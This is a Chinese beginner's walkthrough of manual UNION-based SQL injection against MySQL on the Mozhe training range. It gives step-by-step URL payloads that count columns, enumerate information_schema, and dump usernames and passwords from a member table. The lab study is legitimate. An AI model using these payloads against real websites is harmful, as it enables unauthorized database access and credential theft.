admin管理员组文章数量:1794759
零基础学习MYSQL高版本手工联合注入(墨者靶场)
靶场地址:SQL手工注入漏洞测试(MYSQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
查询函数:
数据库版本: version() 数据库名字: database() 数据库用户: user() 操作系统: @@version_compile_os
?id =1 order by 5 爆出字段数为5 ?id = -1 select select 1,2,3,4 报错回显 ?id=-1 union select 1,database(),3,4 爆出数据库名:mozhe_Discuz_StormGroup必要知识点: 在Mysql5.0以上版本中,mysql存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表面或列名信。
数据库中符合"."代表下一级,如xxx.user表示xxx数据库下的user表名
imformation_schema.tables:记录所有表名信的表 imformation_schema.columns:记录所有列名信的表
查询指定数据库名 mozhe_Discuz_StormGroup 下的表名信:
?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'爆出表名 StormGroup_member,notice
查询指定表名 StormGroup_member 下的列名信:
?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'爆出列名 id,name,password,status
最后直接利用查询语句在当前数据库查询表StormGroup_member下的name password 数据
?id=-1 union select 1,2,3,4 from 表名 ?id=-1 union select 1,name,password,4 from StormGroup_member至此结束
版权声明:本文标题:零基础学习MYSQL高版本手工联合注入(墨者靶场) 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1687053990a130613.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论